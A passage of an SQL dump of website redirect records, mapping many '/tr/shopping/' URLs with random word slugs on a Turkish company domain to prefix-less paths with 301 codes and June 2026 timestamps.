00:00:00',301),(71738,'https://3s-technologies.com.tr/tr/shopping/morphon/856585397.html',NULL,'https://3s-technologies.com.tr/shopping/morphon/856585397.html','',1,0,'2026-06-11 03:51:35','0000-00-00 00:00:00',301),(71739,'https://3s-technologies.com.tr/tr/shopping/talking/1365492895.html',NULL,'https://3s-technologies.com.tr/shopping/talking/1365492895.html','',1,0,'2026-06-11 03:51:38','0000-00-00 00:00:00',301),(71740,'https://3s-technologies.com.tr/tr/shopping/hatchel/690859.html',NULL,'https://3s-technologies.com.tr/shopping/hatchel/690859.html','',1,0,'2026-06-11 03:51:41','0000-00-00 00:00:00',301),(71741,'https://3s-technologies.com.tr/tr/shopping/effeminating/3235706534.html',NULL,'https://3s-technologies.com.tr/shopping/effeminating/3235706534.html','',1,0,'2026-06-11 03:51:45','0000-00-00 00:00:00',301),(71742,'https://3s-technologies.com.tr/tr/shopping/onement/1359528469.html',NULL,'https://3s-technologies.com.tr/shopping/onement/1359528469.html','',1,0,'2026-06-11 03:51:47','0000-00-00 00:00:00',301),(71743,'https://3s-technologies.com.tr/tr/shopping/polyphone/2992996843.html',NULL,'https://3s-technologies.com.tr/shopping/polyphone/2992996843.html','',1,0,'2026-06-11 03:51:52','0000-00-00 00:00:00',301),(71744,'https://3s-technologies.com.tr/tr/shopping/plopped/1747176271.html',NULL,'https://3s-technologies.com.tr/shopping/plopped/1747176271.html','',1,0,'2026-06-11 03:51:57','0000-00-00 00:00:00',301),(71745,'https://3s-technologies.com.tr/tr/shopping/tettering/355940873.html',NULL,'https://3s-technologies.com.tr/shopping/tettering/355940873.html','',1,0,'2026-06-11 03:52:00','0000-00-00 00:00:00',301),(71746,'https://3s-technologies.com.tr/tr/shopping/interarboration/3426847813.html',NULL,'https://3s-technologies.com.tr/shopping/interarboration/3426847813.html','',1,0,'2026-06-11 03:52:03','0000-00-00 00:00:00',301),(71747,'https://3s-technologies.com.tr/tr/shopping/overcount/1241499120.html',NULL,'https://3s-technologies.com.tr/shopping/overcount/1241499120.html','',1,0,'2026-06-11 03:52:06','0000-00-00 00:00:00',301),(71748,'https://3s-technologies.com.tr/tr/shopping/interset/1996959233.html',NULL,'https://3s-technologies.com.tr/shopping/interset/1996959233.html','',1,0,'2026-06-11 03:52:09','0000-00-00 00:00:00',301),(71749,'https://3s-technologies.com.tr/tr/shopping/torcher/14217943.html',NULL,'https://3s-technologies.com.tr/shopping/torcher/14217943.html','',1,0,'2026-06-11 03:52:12','0000-00-00 00:00:00',301),(71750,'https://3s-technologies.com.tr/tr/shopping/knelling/422618148.html',NULL,'https://3s-technologies.com.tr/shopping/knelling/422618148.html','',1,0,'2026-06-11 03:52:21','0000-00-00 00:00:00',301),(71751,'https://3s-technologies.com.tr/tr/shopping/unchurch/2113035138.html',NULL,'https://3s-technologies.com.tr/shopping/unchurch/2113035138.html','',1,0,'2026-06-11 03:52:24','0000-00-00 00:00:00',301),(71752,'https://3s-technologies.com.tr/tr/shopping/connexive/744865784.html',NULL,'https://3s-technologies.com.tr/shopping/connexive/744865784.html','',1,0,'2026-06-11 03:52:27','0000-00-00 00:00:00',301),(71753,'https://3s-technologies.com.tr/tr/shopping/viscerating/3796986876.html',NULL,'https://3s-technologies.com.tr/shopping/viscerating/3796986876.html','',1,0,'2026-06-11 03:52:30','0000-00-00 00:00:00',301),(71754,'https://3s-technologies.com.tr/tr/shopping/polyglottous/523772106.html',NULL,'https://3s-technologies.com.tr/shopping/polyglottous/523772106.html','',1,0,'2026-06-11 03:52:33','0000-00-00 00:00:00',301),(71755,'https://3s-technologies.com.tr/tr/shopping/bathymetry/2063417346.html',NULL,'https://3s-technologies.com.tr/shopping/bathymetry/2063417346.html','',1,0,'2026-06-11 03:52:36','0000-00-00 00:00:00',301),(71756,'https://3s-technologies.com.tr/tr/shopping/pretend/4279768481.html',NULL,'https://3s-technologies.com.tr/shopping/pretend/4279768481.html','',1,0,'2026-06-11 03:52:39','0000-00-00 00:00:00',301),(71757,'https://3s-technologies.com.tr/tr/shopping/tempt/938960679.html',NULL,'https://3s-technologies.com.tr/shopping/tempt/938960679.html','',1,0,'2026-06-11 03:52:42','0000-00-00 00:00:00',301),(71758,'https://3s-technologies.com.tr/tr/shopping/anhinga/2403730067.html',NULL,'https://3s-technologies.com.tr/shopping/anhinga/2403730067.html','',1,0,'2026-06-11 03:52:47','0000-00-00 00:00:00',301),(71759,'https://3s-technologies.com.tr/tr/shopping/sandaled/3605809689.html',NULL,'https://3s-technologies.com.tr/shopping/sandaled/3605809689.html','',1,0,'2026-06-11 03:52:51','0000-00-00 00:00:00',301),(71760,'https://3s-technologies.com.tr/tr/shopping/galleries/2544567832.html',NULL,'https://3s-technologies.com.tr/shopping/galleries/2544567832.html','',1,0,'2026-06-11 03:52:54','0000-00-00 00:00:00',301),(71761,'https://3s-technologies.com.tr/tr/shopping/disrupted/1058202159.html',NULL,'https://3s-technologies.com.tr/shopping/disrupted/1058202159.html','',1,0,'2026-06-11 03:52:57','0000-00-00 00:00:00',301),(71762,'https://3s-technologies.com.tr/tr/shopping/interdict/3993119730.html',NULL,'https://3s-technologies.com.tr/shopping/interdict/3993119730.html','',1,0,'2026-06-11 03:53:00','0000-00-00 00:00:00',301),(71763,'https://3s-technologies.com.tr/tr/shopping/fiddleneck/2599895302.html',NULL,'https://3s-technologies.com.tr/shopping/fiddleneck/2599895302.html','',1,0,'2026-06-11 03:53:03','0000-00-00 00:00:00',301),(71764,'https://3s-technologies.com.tr/tr/shopping/angora/394458804.html',NULL,'https://3s-technologies.com.tr/shopping/angora/394458804.html','',1,0,'2026-06-11 03:53:06','0000-00-00 00:00:00',301),(71765,'https://3s-technologies.com.tr/tr/shopping/markman/3226365451.html',NULL,'https://3s-technologies.com.tr/shopping/markman/3226365451.html','',1,0,'2026-06-11 03:53:09','0000-00-00 00:00:00',301),(71766,'https://3s-technologies.com.tr/tr/shopping/geodesical/345790478.html',NULL,'https://3s-technologies.com.tr/shopping/geodesical/345790478.html','',1,0,'2026-06-11 03:53:16','0000-00-00 00:00:00',301),(71767,'https://3s-technologies.com.tr/tr/shopping/mainframe/4192525620.html',NULL,'https://3s-technologies.com.tr/shopping/mainframe/4192525620.html','',1,0,'2026-06-11 03:53:21','0000-00-00 00:00:00',301),(71768,'https://3s-technologies.com.tr/tr/shopping/tripos/2825568397.html',NULL,'https://3s-technologies.com.tr/shopping/tripos/2825568397.html','',1,0,'2026-06-11 03:53:24','0000-00-00 00:00:00',301),(71769,'https://3s-technologies.com.tr/tr/shopping/ragtime/3271263268.html',NULL,'https://3s-technologies.com.tr/shopping/ragtime/3271263268.html','',1,0,'2026-06-11 03:53:27','0000-00-00 00:00:00',301),(71770,'https://3s-technologies.com.tr/tr/shopping/stive/3150410445.html',NULL,'https://3s-technologies.com.tr/shopping/stive/3150410445.html','',1,0,'2026-06-11 03:53:30','0000-00-00 00:00:00',301),(71771,'https://3s-technologies.com.tr/tr/shopping/trappings/3408464752.html',NULL,'https://3s-technologies.com.tr/shopping/trappings/3408464752.html','',1,0,'2026-06-11 03:53:33','0000-00-00 00:00:00',301),(71772,'https://3s-technologies.com.tr/tr/shopping/pyogenes/347166084.html',NULL,'https://3s-technologies.com.tr/shopping/pyogenes/347166084.html','',1,0,'2026-06-11 03:53:36','0000-00-00 00:00:00',301),(71773,'https://3s-technologies.com.tr/tr/shopping/marry/3738902887.html',NULL,'https://3s-technologies.com.tr/shopping/marry/3738902887.html','',1,0,'2026-06-11 03:53:39','0000-00-00 00:00:00',301),(71774,'https://3s-technologies.com.tr/tr/shopping/aquaria/1851638136.html',NULL,'https://3s-technologies.com.tr/shopping/aquaria/1851638136.html','',1,0,'2026-06-11 03:54:01','0000-00-00 00:00:00',301),(71775,'https://3s-technologies.com.tr/tr/shopping/subspinosus/1085116162.html',NULL,'https://3s-technologies.com.tr/shopping/subspinosus/1085116162.html','',1,0,'2026-06-11 03:54:08','0000-00-00 00:00:00',301),(71776,'https://3s-technologies.com.tr/tr/shopping/daemanorops/957519316.html',NULL,'https://3s-technologies.com.tr/shopping/daemanorops/957519316.html','',1,0,'2026-06-11 03:54:11','0000-00-00 00:00:00',301),(71777,'https://3s-technologies.com.tr/tr/shopping/symptomatically/3098365398.html',NULL,'https://3s-technologies.com.tr/shopping/symptomatically/3098365398.html','',1,0,'2026-06-11 03:54:14','0000-00-00 00:00:00',301),(71778,'https://3s-technologies.com.tr/tr/shopping/linoxin/3925529506.html',NULL,'https://3s-technologies.com.tr/shopping/linoxin/3925529506.html','',1,0,'2026-06-11 03:54:17','0000-00-00 00:00:00',301),(71779,'https://3s-technologies.com.tr/tr/shopping/mopeeyed/2012842187.html',NULL,'https://3s-technologies.com.tr/shopping/mopeeyed/2012842187.html','',1,0,'2026-06-11 03:54:20','0000-00-00 00:00:00',301),(71780,'https://3s-technologies.com.tr/tr/shopping/leutenant/293775977.html',NULL,'https://3s-technologies.com.tr/shopping/leutenant/293775977.html','',1,0,'2026-06-11 03:54:23','0000-00-00 00:00:00',301),(71781,'https://3s-technologies.com.tr/tr/shopping/dinnerless/2259611714.html',NULL,'https://3s-technologies.com.tr/shopping/dinnerless/2259611714.html','',1,0,'2026-06-11 03:54:26','0000-00-00 00:00:00',301),(71782,'https://3s-technologies.com.tr/tr/shopping/remind/4293217834.html',NULL,'https://3s-technologies.com.tr/shopping/remind/4293217834.html','',1,0,'2026-06-11 03:54:29','0000-00-00 00:00:00',301),(71783,'https://3s-technologies.com.tr/tr/shopping/organization/50099327.html',NULL,'https://3s-technologies.com.tr/shopping/organization/50099327.html','',1,0,'2026-06-11 03:54:33','0000-00-00 00:00:00',301),(71784,'https://3s-technologies.com.tr/tr/shopping/auspicious/222912717.html',NULL,'https://3s-technologies.com.tr/shopping/auspicious/222912717.html','',1,0,'2026-06-11 03:54:36','0000-00-00 00:00:00',301),(71785,'https://3s-technologies.com.tr/tr/shopping/seriate/2188684734.html',NULL,'https://3s-technologies.com.tr/shopping/seriate/2188684734.html','',1,0,'2026-06-11 03:54:39','0000-00-00 00:00:00',301),(71786,'https://3s-technologies.com.tr/tr/shopping/dactylonomy/1599268904.html',NULL,'https://3s-technologies.com.tr/shopping/dactylonomy/1599268904.html','',1,0,'2026-06-11 03:54:42','0000-00-00 00:00:00',301),(71787,'https://3s-technologies.com.tr/tr/shopping/hatcher/2325722663.html',NULL,'https://3s-technologies.com.tr/shopping/hatcher/2325722663.html','',1,0,'2026-06-11 03:54:45','0000-00-00 00:00:00',301),(71788,'https://3s-technologies.com.tr/tr/shopping/abscess/2743710496.html',NULL,'https://3s-technologies.com.tr/shopping/abscess/2743710496.html','',1,0,'2026-06-11 03:54:48','0000-00-00 00:00:00',301),(71789,'https://3s-technologies.com.tr/tr/shopping/peract/778968743.html',NULL,'https://3s-technologies.com.tr/shopping/peract/778968743.html','',1,0,'2026-06-11 03:54:51','0000-00-00 00:00:00',301),(71790,'https://3s-technologies.com.tr/tr/shopping/letterpress/585000495.html',NULL,'https://3s-technologies.com.tr/shopping/letterpress/585000495.html','',1,0,'2026-06-11 03:54:54','0000-00-00 00:00:00',301),(71791,'https://3s-technologies.com.tr/tr/shopping/perfuse/3664435711.html',NULL,'https://3s-technologies.com.tr/shopping/perfuse/3664435711.html','',1,0,'2026-06-11 03:55:31','0000-00-00 00:00:00',301),(71792,'https://3s-technologies.com.tr/tr/shopping/polyzoaria/2940102958.html',NULL,'https://3s-technologies.com.tr/shopping/polyzoaria/2940102958.html','',1,0,'2026-06-11 03:55:35','0000-00-00 00:00:00',301),(71793,'https://3s-technologies.com.tr/tr/shopping/traduction/3891106689.html',NULL,'https://3s-technologies.com.tr/shopping/traduction/3891106689.html','',1,0,'2026-06-11 03:55:38','0000-00-00 00:00:00',301),(71794,'https://3s-technologies.com.tr/tr/shopping/aruru/3667975907.html',NULL,'https://3s-technologies.com.tr/shopping/aruru/3667975907.html','',1,0,'2026-06-11 03:55:41','0000-00-00 00:00:00',301),(71795,'https://3s-technologies.com.tr/tr/shopping/mousse/3041989352.html',NULL,'https://3s-technologies.com.tr/shopping/mousse/3041989352.html','',1,0,'2026-06-11 03:55:44','0000-00-00 00:00:00',301),(71796,'https://3s-technologies.com.tr/tr/shopping/rebelling/567645441.html',NULL,'https://3s-technologies.com.tr/shopping/rebelling/567645441.html','',1,0,'2026-06-11 03:55:47','0000-00-00 00:00:00',301),(71797,'https://3s-technologies.com.tr/tr/shopping/nomadic/4078883300.html',NULL,'https://3s-technologies.com.tr/shopping/nomadic/4078883300.html','',1,0,'2026-06-11 03:55:50','0000-00-00 00:00:00',301),(71798,'https://3s-technologies.com.tr/tr/shopping/flate/1654293199.html',NULL,'https://3s-technologies.com.tr/shopping/flate/1654293199.html','',1,0,'2026-06-11 03:55:53','0000-00-00 00:00:00',301),(71799,'https://3s-technologies.com.tr/tr/shopping/congressive/1364117257.html',NULL,'https://3s-technologies.com.tr/shopping/congressive/1364117257.html','',1,0,'2026-06-11 03:56:00','0000-00-00 00:00:00',301),(71800,'https://3s-technologies.com.tr/tr/shopping/sheared/3084221327.html',NULL,'https://3s-technologies.com.tr/shopping/sheared/3084221327.html','',1,0,'2026-06-11 03:56:04','0000-00-00 00:00:00',301),(71801,'https://3s-technologies.com.tr/tr/shopping/culinary/3721547833.html',NULL,'https://3s-technologies.com.tr/shopping/culinary/3721547833.html','',1,0,'2026-06-11 03:56:07','0000-00-00 00:00:00',301),(71802,'https://3s-technologies.com.tr/tr/shopping/mesoderm/590964889.html',NULL,'https://3s-technologies.com.tr/shopping/mesoderm/590964889.html','',1,0,'2026-06-11 03:56:10','0000-00-00 00:00:00',301),(71803,'https://3s-technologies.com.tr/tr/shopping/asexually/1588312499.html',NULL,'https://3s-technologies.com.tr/shopping/asexually/1588312499.html','',1,0,'2026-06-11 03:56:13','0000-00-00 00:00:00',301),(71804,'https://3s-technologies.com.tr/tr/shopping/compilator/3863796183.html',NULL,'https://3s-technologies.com.tr/shopping/compilator/3863796183.html','',1,0,'2026-06-11 03:56:16','0000-00-00 00:00:00',301),(71805,'https://3s-technologies.com.tr/tr/shopping/expounder/3696670944.html',NULL,'https://3s-technologies.com.tr/shopping/expounder/3696670944.html','',1,0,'2026-06-11 03:56:19','0000-00-00 00:00:00',301),(71806,'https://3s-technologies.com.tr/tr/shopping/awaking/2942431071.html',NULL,'https://3s-technologies.com.tr/shopping/awaking/2942431071.html','',1,0,'2026-06-11 03:56:22','0000-00-00 00:00:00',301),(71807,'https://3s-technologies.com.tr/tr/shopping/posticous/720750164.html',NULL,'https://3s-technologies.com.tr/shopping/posticous/720750164.html','',1,0,'2026-06-11 03:56:25','0000-00-00 00:00:00',301),(71808,'https://3s-technologies.com.tr/tr/shopping/serval/693890488.html',NULL,'https://3s-technologies.com.tr/shopping/serval/693890488.html','',1,0,'2026-06-11 03:56:28','0000-00-00 00:00:00',301),(71809,'https://3s-technologies.com.tr/tr/shopping/brightly/498288052.html',NULL,'https://3s-technologies.com.tr/shopping/brightly/498288052.html','',1,0,'2026-06-11 03:56:31','0000-00-00 00:00:00',301),(71810,'https://3s-technologies.com.tr/tr/shopping/intermingle/3934668862.html',NULL,'https://3s-technologies.com.tr/shopping/intermingle/3934668862.html','',1,0,'2026-06-11 03:56:34','0000-00-00 00:00:00',301),(71811,'https://3s-technologies.com.tr/tr/shopping/contentless/1848261447.html',NULL,'https://3s-technologies.com.tr/shopping/contentless/1848261447.html','',1,0,'2026-06-11 03:56:37','0000-00-00 00:00:00',301),(71812,'https://3s-technologies.com.tr/tr/shopping/donaught/3667966520.html',NULL,'https://3s-technologies.com.tr/shopping/donaught/3667966520.html','',1,0,'2026-06-11 03:56:40','0000-00-00 00:00:00',301),(71813,'https://3s-technologies.com.tr/tr/shopping/inghalla/3791233596.html',NULL,'https://3s-technologies.com.tr/shopping/inghalla/3791233596.html','',1,0,'2026-06-11 03:56:43','0000-00-00 00:00:00',301),(71814,'https://3s-technologies.com.tr/tr/shopping/circuitousness/2519690943.html',NULL,'https://3s-technologies.com.tr/shopping/circuitousness/2519690943.html','',1,0,'2026-06-11 03:56:46','0000-00-00 00:00:00',301),(71815,'https://3s-technologies.com.tr/tr/shopping/cackled/2913484958.html',NULL,'https://3s-technologies.com.tr/shopping/cackled/2913484958.html','',1,0,'2026-06-11 03:56:49','0000-00-00 00:00:00',301),(71816,'https://3s-technologies.com.tr/tr/shopping/alackaday/47675113.html',NULL,'https://3s-technologies.com.tr/shopping/alackaday/47675113.html','',1,0,'2026-06-11 03:56:52','0000-00-00 00:00:00',301),(71817,'https://3s-technologies.com.tr/tr/shopping/hemisection/4195960190.html',NULL,'https://3s-technologies.com.tr/shopping/hemisection/4195960190.html','',1,0,'2026-06-11 03:56:55','0000-00-00 00:00:00',301),(71818,'https://3s-technologies.com.tr/tr/shopping/colinus/216237476.html',NULL,'https://3s-technologies.com.tr/shopping/colinus/216237476.html','',1,0,'2026-06-11 03:56:58','0000-00-00 00:00:00',301),(71819,'https://3s-technologies.com.tr/tr/shopping/candescent/533352889.html',NULL,'https://3s-technologies.com.tr/shopping/candescent/533352889.html','',1,0,'2026-06-11 03:57:01','0000-00-00 00:00:00',301),(71820,'https://3s-technologies.com.tr/tr/shopping/contopus/3311549348.html',NULL,'https://3s-technologies.com.tr/shopping/contopus/3311549348.html','',1,0,'2026-06-11 03:57:04','0000-00-00 00:00:00',301),(71821,'https://3s-technologies.com.tr/tr/shopping/prelection/1701189900.html',NULL,'https://3s-technologies.com.tr/shopping/prelection/1701189900.html','',1,0,'2026-06-11 03:57:07','0000-00-00 00:00:00',301),(71822,'https://3s-technologies.com.tr/tr/shopping/baseline/545192734.html',NULL,'https://3s-technologies.com.tr/shopping/baseline/545192734.html','',1,0,'2026-06-11 03:57:10','0000-00-00 00:00:00',301),(71823,'https://3s-technologies.com.tr/tr/shopping/caparison/3860428897.html',NULL,'https://3s-technologies.com.tr/shopping/caparison/3860428897.html','',1,0,'2026-06-11 03:57:13','0000-00-00 00:00:00',301),(71824,'https://3s-technologies.com.tr/tr/shopping/perispore/977298568.html',NULL,'https://3s-technologies.com.tr/shopping/perispore/977298568.html','',1,0,'2026-06-11 03:57:16','0000-00-00 00:00:00',301),(71825,'https://3s-technologies.com.tr/tr/shopping/almsgiver/2761141504.html',NULL,'https://3s-technologies.com.tr/shopping/almsgiver/2761141504.html','',1,0,'2026-06-11 03:57:19','0000-00-00 00:00:00',301),(71826,'https://3s-technologies.com.tr/tr/shopping/shadow/2468966694.html',NULL,'https://3s-technologies.com.tr/shopping/shadow/2468966694.html','',1,0,'2026-06-11 03:57:22','0000-00-00 00:00:00',301),(71827,'https://3s-technologies.com.tr/tr/shopping/bourn/1964645802.html',NULL,'https://3s-technologies.com.tr/shopping/bourn/1964645802.html','',1,0,'2026-06-11 03:57:25','0000-00-00 00:00:00',301),(71828,'https://3s-technologies.com.tr/tr/shopping/unextinguishable/1305491251.html',NULL,'https://3s-technologies.com.tr/shopping/unextinguishable/1305491251.html','',1,0,'2026-06-11 03:57:33','0000-00-00 00:00:00',301),(71829,'https://3s-technologies.com.tr/tr/shopping/indowment/2420770325.html',NULL,'https://3s-technologies.com.tr/shopping/indowment/2420770325.html','',1,0,'2026-06-11 03:57:35','0000-00-00 00:00:00',301),(71830,'https://3s-technologies.com.tr/tr/shopping/jocosity/3703281127.html',NULL,'https://3s-technologies.com.tr/shopping/jocosity/3703281127.html','',1,0,'2026-06-11 03:57:38','0000-00-00 00:00:00',301),(71831,'https://3s-technologies.com.tr/tr/shopping/deodorizer/505099311.html',NULL,'https://3s-technologies.com.tr/shopping/deodorizer/505099311.html','',1,0,'2026-06-11 03:57:41','0000-00-00 00:00:00',301),(71832,'https://3s-technologies.com.tr/tr/shopping/skimback/581701943.html',NULL,'https://3s-technologies.com.tr/shopping/skimback/581701943.html','',1,0,'2026-06-11 03:57:44','0000-00-00 00:00:00',301),(71833,'https://3s-technologies.com.tr/tr/shopping/windle/4204089174.html',NULL,'https://3s-technologies.com.tr/shopping/windle/4204089174.html','',1,0,'2026-06-11 03:57:47','0000-00-00 00:00:00',301),(71834,'https://3s-technologies.com.tr/tr/shopping/didactyl/64501171.html',NULL,'https://3s-technologies.com.tr/shopping/didactyl/64501171.html','',1,0,'2026-06-11 03:57:50','0000-00-00 00:00:00',301),(71835,'https://3s-technologies.com.tr/tr/shopping/nutalli/599739694.html',NULL,'https://3s-technologies.com.tr/shopping/nutalli/599739694.html','',1,0,'2026-06-11 03:57:53','0000-00-00 00:00:00',301),(71836,'https://3s-technologies.com.tr/tr/shopping/innerve/4199336879.html',NULL,'https://3s-technologies.com.tr/shopping/innerve/4199336879.html','',1,0,'2026-06-11 03:57:56','0000-00-00 00:00:00',301),(71837,'https://3s-technologies.com.tr/tr/shopping/crowsilk/1589053483.html',NULL,'https://3s-technologies.com.tr/shopping/crowsilk/1589053483.html','',1,0,'2026-06-11 03:57:59','0000-00-00 00:00:00',301),(71838,'https://3s-technologies.com.tr/tr/shopping/haemo/876440619.html',NULL,'https://3s-technologies.com.tr/shopping/haemo/876440619.html','',1,0,'2026-06-11 03:58:02','0000-00-00 00:00:00',301),(71839,'https://3s-technologies.com.tr/tr/shopping/yesterweek/285725130.html',NULL,'https://3s-technologies.com.tr/shopping/yesterweek/285725130.html','',1,0,'2026-06-11 03:58:05','0000-00-00 00:00:00',301),(71840,'https://3s-technologies.com.tr/tr/shopping/protosulphide/3462807334.html',NULL,'https://3s-technologies.com.tr/shopping/protosulphide/3462807334.html','',1,0,'2026-06-11 03:58:08','0000-00-00 00:00:00',301),(71841,'https://3s-technologies.com.tr/tr/shopping/weltered/2949916030.html',NULL,'https://3s-technologies.com.tr/shopping/weltered/2949916030.html','',1,0,'2026-06-11 03:58:11','0000-00-00 00:00:00',301),(71842,'https://3s-technologies.com.tr/tr/shopping/lineation/889080254.html',NULL,'https://3s-technologies.com.tr/shopping/lineation/889080254.html','',1,0,'2026-06-11 03:58:20','0000-00-00 00:00:00',301),(71843,'https://3s-technologies.com.tr/tr/shopping/idaeus/787097759.html',NULL,'https://3s-technologies.com.tr/shopping/idaeus/787097759.html','',1,0,'2026-06-11 03:58:25','0000-00-00 00:00:00',301),(71844,'https://3s-technologies.com.tr/tr/shopping/flawn/3931128634.html',NULL,'https://3s-technologies.com.tr/shopping/flawn/3931128634.html','',1,0,'2026-06-11 03:58:27','0000-00-00 00:00:00',301),(71845,'https://3s-technologies.com.tr/tr/shopping/freightless/1699977785.html',NULL,'https://3s-technologies.com.tr/shopping/freightless/1699977785.html','',1,0,'2026-06-11 03:58:31','0000-00-00 00:00:00',301),(71846,'https://3s-technologies.com.tr/tr/shopping/twill/2379458128.html',NULL,'https://3s-technologies.com.tr/shopping/twill/2379458128.html','',1,0,'2026-06-11 03:58:33','0000-00-00 00:00:00',301),(71847,'https://3s-technologies.com.tr/tr/shopping/fourinhand/2943643170.html',NULL,'https://3s-technologies.com.tr/shopping/fourinhand/2943643170.html','',1,0,'2026-06-11 03:58:37','0000-00-00 00:00:00',301),(71848,'https://3s-technologies.com.tr/tr/shopping/sompnour/436336905.html',NULL,'https://3s-technologies.com.tr/shopping/sompnour/436336905.html','',1,0,'2026-06-11 03:58:45','0000-00-00 00:00:00',301),(71849,'https://3s-technologies.com.tr/tr/shopping/concealable/3592360336.html',NULL,'https://3s-technologies.com.tr/shopping/concealable/3592360336.html','',1,0,'2026-06-11 03:58:50','0000-00-00 00:00:00',301),(71850,'https://3s-technologies.com.tr/tr/shopping/complicating/3166079228.html',NULL,'https://3s-technologies.com.tr/shopping/complicating/3166079228.html','',1,0,'2026-06-11 03:58:53','0000-00-00 00:00:00',301),(71851,'https://3s-technologies.com.tr/tr/shopping/milberti/3017719612.html',NULL,'https://3s-technologies.com.tr/shopping/milberti/3017719612.html','',1,0,'2026-06-11 03:58:56','0000-00-00 00:00:00',301),(71852,'https://3s-technologies.com.tr/tr/shopping/carbunculation/2535304886.html',NULL,'https://3s-technologies.com.tr/shopping/carbunculation/2535304886.html','',1,0,'2026-06-11 03:58:59','0000-00-00 00:00:00',301),(71853,'https://3s-technologies.com.tr/tr/shopping/glengarry/1327762155.html',NULL,'https://3s-technologies.com.tr/shopping/glengarry/1327762155.html','',1,0,'2026-06-11 03:59:02','0000-00-00 00:00:00',301),(71854,'https://3s-technologies.com.tr/tr/shopping/gronte/3952707019.html',NULL,'https://3s-technologies.com.tr/shopping/gronte/3952707019.html','',1,0,'2026-06-11 03:59:05','0000-00-00 00:00:00',301),(71855,'https://3s-technologies.com.tr/tr/shopping/stational/1303490184.html',NULL,'https://3s-technologies.com.tr/shopping/stational/1303490184.html','',1,0,'2026-06-11 03:59:08','0000-00-00 00:00:00',301),(71856,'https://3s-technologies.com.tr/tr/shopping/erethistic/3489984892.html',NULL,'https://3s-technologies.com.tr/shopping/erethistic/3489984892.html','',1,0,'2026-06-11 03:59:11','0000-00-00 00:00:00',301),(71857,'https://3s-technologies.com.tr/tr/shopping/trainer/639343077.html',NULL,'https://3s-technologies.com.tr/shopping/trainer/639343077.html','',1,0,'2026-06-11 03:59:14','0000-00-00 00:00:00',301),(71858,'https://3s-technologies.com.tr/tr/shopping/maimed/2497825238.html',NULL,'https://3s-technologies.com.tr/shopping/maimed/2497825238.html','',1,0,'2026-06-11 03:59:17','0000-00-00 00:00:00',301),(71859,'https://3s-technologies.com.tr/tr/shopping/burial/408602907.html',NULL,'https://3s-technologies.com.tr/shopping/burial/408602907.html','',1,0,'2026-06-11 03:59:20','0000-00-00 00:00:00',301),(71860,'https://3s-technologies.com.tr/tr/shopping/dweller/676671468.html',NULL,'https://3s-technologies.com.tr/shopping/dweller/676671468.html','',1,0,'2026-06-11 03:59:24','0000-00-00 00:00:00',301),(71861,'https://3s-technologies.com.tr/tr/shopping/nugae/2419817834.html',NULL,'https://3s-technologies.com.tr/shopping/nugae/2419817834.html','',1,0,'2026-06-11 03:59:27','0000-00-00 00:00:00',301),(71862,'https://3s-technologies.com.tr/tr/shopping/delegacy/598449848.html',NULL,'https://3s-technologies.com.tr/shopping/delegacy/598449848.html','',1,0,'2026-06-11 03:59:30','0000-00-00 00:00:00',301),(71863,'https://3s-technologies.com.tr/tr/shopping/actinophone/1836707296.html',NULL,'https://3s-technologies.com.tr/shopping/actinophone/1836707296.html','',1,0,'2026-06-11 03:59:33','0000-00-00 00:00:00',301),(71864,'https://3s-technologies.com.tr/tr/shopping/comperendinate/1942626006.html',NULL,'https://3s-technologies.com.tr/shopping/comperendinate/1942626006.html','',1,0,'2026-06-11 03:59:36','0000-00-00 00:00:00',301),(71865,'https://3s-technologies.com.tr/tr/shopping/preponderantly/343625888.html',NULL,'https://3s-technologies.com.tr/shopping/preponderantly/343625888.html','',1,0,'2026-06-11 03:59:39','0000-00-00 00:00:00',301),(71866,'https://3s-technologies.com.tr/tr/shopping/lenis/3484144043.html',NULL,'https://3s-technologies.com.tr/shopping/lenis/3484144043.html','',1,0,'2026-06-11 03:59:42','0000-00-00 00:00:00',301),(71867,'https://3s-technologies.com.tr/tr/shopping/kritarchy/2470178793.html',NULL,'https://3s-technologies.com.tr/shopping/kritarchy/2470178793.html','',1,0,'2026-06-11 03:59:45','0000-00-00 00:00:00',301),(71868,'https://3s-technologies.com.tr/tr/shopping/nickar/3573793183.html',NULL,'https://3s-technologies.com.tr/shopping/nickar/3573793183.html','',1,0,'2026-06-11 03:59:48','0000-00-00 00:00:00',301),(71869,'https://3s-technologies.com.tr/tr/shopping/textrine/2204057001.html',NULL,'https://3s-technologies.com.tr/shopping/textrine/2204057001.html','',1,0,'2026-06-11 03:59:51','0000-00-00 00:00:00',301),(71870,'https://3s-technologies.com.tr/tr/shopping/baculite/1464800084.html',NULL,'https://3s-technologies.com.tr/shopping/baculite/1464800084.html','',1,0,'2026-06-11 03:59:57','0000-00-00 00:00:00',301),(71871,'https://3s-technologies.com.tr/tr/shopping/baboonish/4057988050.html',NULL,'https://3s-technologies.com.tr/shopping/baboonish/4057988050.html','',1,0,'2026-06-11 04:00:00','0000-00-00 00:00:00',301),(71872,'https://3s-technologies.com.tr/tr/shopping/vicine/235678967.html',NULL,'https://3s-technologies.com.tr/shopping/vicine/235678967.html','',1,0,'2026-06-11 04:00:03','0000-00-00 00:00:00',301),(71873,'https://3s-technologies.com.tr/tr/shopping/bitume/2022059725.html',NULL,'https://3s-technologies.com.tr/shopping/bitume/2022059725.html','',1,0,'2026-06-11 04:00:06','0000-00-00 00:00:00',301),(71874,'https://3s-technologies.com.tr/tr/shopping/astrometer/2494285042.html',NULL,'https://3s-technologies.com.tr/shopping/astrometer/2494285042.html','',1,0,'2026-06-11 04:00:09','0000-00-00 00:00:00',301),(71875,'https://3s-technologies.com.tr/tr/shopping/souse/3002915387.html',NULL,'https://3s-technologies.com.tr/shopping/souse/3002915387.html','',1,0,'2026-06-11 04:00:12','0000-00-00 00:00:00',301),(71876,'https://3s-technologies.com.tr/tr/shopping/lumpectomy/944879697.html',NULL,'https://3s-technologies.com.tr/shopping/lumpectomy/944879697.html','',1,0,'2026-06-11 04:00:15','0000-00-00 00:00:00',301),(71877,'https://3s-technologies.com.tr/tr/shopping/rufus/2699313947.html',NULL,'https://3s-technologies.com.tr/shopping/rufus/2699313947.html','',1,0,'2026-06-11 04:00:18','0000-00-00 00:00:00',301),(71878,'https://3s-technologies.com.tr/tr/shopping/sapient/1826154098.html',NULL,'https://3s-technologies.com.tr/shopping/sapient/1826154098.html','',1,0,'2026-06-11 04:00:21','0000-00-00 00:00:00',301),(71879,'https://3s-technologies.com.tr/tr/shopping/tufaceous/1797459061.html',NULL,'https://3s-technologies.com.tr/shopping/tufaceous/1797459061.html','',1,0,'2026-06-11 04:00:24','0000-00-00 